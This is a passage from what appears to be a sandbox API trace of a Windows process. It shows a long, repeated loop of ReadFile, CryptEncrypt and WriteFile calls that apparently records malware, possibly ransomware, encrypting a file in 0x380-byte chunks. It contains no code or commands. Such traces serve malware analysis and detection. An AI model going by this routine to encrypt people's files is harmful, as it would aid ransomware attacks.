lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.623] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.624] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.625] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.626] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.627] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.628] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.629] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.629] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 